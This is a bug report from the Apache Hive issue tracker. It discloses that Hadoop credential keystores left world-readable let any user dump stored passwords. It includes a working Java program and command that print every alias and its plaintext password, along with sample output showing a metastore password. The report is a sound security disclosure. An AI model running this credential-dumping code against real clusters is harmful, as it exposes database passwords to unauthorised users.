Hive / HIVE-19746

Hadoop credential provider allows every user to read passwords


    Details

    • Type: Bug
    • Status: Open
    • Priority: Blocker
    • Resolution: Unresolved
    • Affects Version/s: None
    • Fix Version/s: None
    • Component/s: Security
    • Labels:
      None

      Description

      This simple program allows reading any password from any jceks file:

      package com.test.app;
      
      import java.io.IOException;
      import java.util.List;
      
      import org.apache.hadoop.conf.Configuration;
      import org.apache.hadoop.security.alias.CredentialProvider;
      import org.apache.hadoop.security.alias.CredentialProviderFactory;
      
      /**
       * Dumps every alias stored in the credential provider given on the command line,
       * e.g. jceks://hdfs/user/hive/hivemetastore.jceks. Any user who can read the
       * jceks file can run this.
       */
      public class PasswordReader {
        public static void main(String[] args) throws IOException {
          if (args == null || args.length == 0) {
            throw new IllegalArgumentException("Credential provider path must be set");
          }
          String credentialProviderPath = args[0];
          Configuration configuration = new Configuration();
          // Point hadoop.security.credential.provider.path at the keystore to read.
          configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, credentialProviderPath);
          // First provider on the path; here the JavaKeyStoreProvider backed by HDFS.
          CredentialProvider credentialProvider = CredentialProviderFactory.getProviders(configuration).get(0);
          List<String> aliases = credentialProvider.getAliases();
          for (String alias : aliases) {
            // Configuration.getPassword() resolves each alias through the provider path.
            System.out.println(alias + " = " + new String(configuration.getPassword(alias)));
          }
        }
      }
      
      java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader jceks://hdfs/user/hive/hivemetastore.jceks
      

      RESULT

      javax.jdo.option.connectionpassword = 123456
      

      File jceks://hdfs/user/hive/hivemetastore.jceks has -rw-r--r-- permissions and hdfs:hdfs owner:group. We can't remove world-readable permissions here, because Hive is configured for impersonation to allow users other than hdfs to connect to HiveServer2. When I removed world-readable permissions and tried to connect as another user, I got the exception:

      2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure for: /user/hive/hivemetastore.jceks, error: Input/output error
      2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception for: /user/hive/hivemetastore.jceks, error: Input/output error
      2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] metastore.RetryingHMSHandler: java.lang.RuntimeException: Error getting metastore password: null
          at org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485)
          at org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279)
      

      Any ideas on how to protect the passwords (say, restrict access to jceks://hdfs/user/hive/hivemetastore.jceks to 600) and at the same time still be able to connect to HS2 as a non-admin user?

              People

              • Assignee: osayankin (Oleksiy Sayankin)
              • Reporter: osayankin (Oleksiy Sayankin)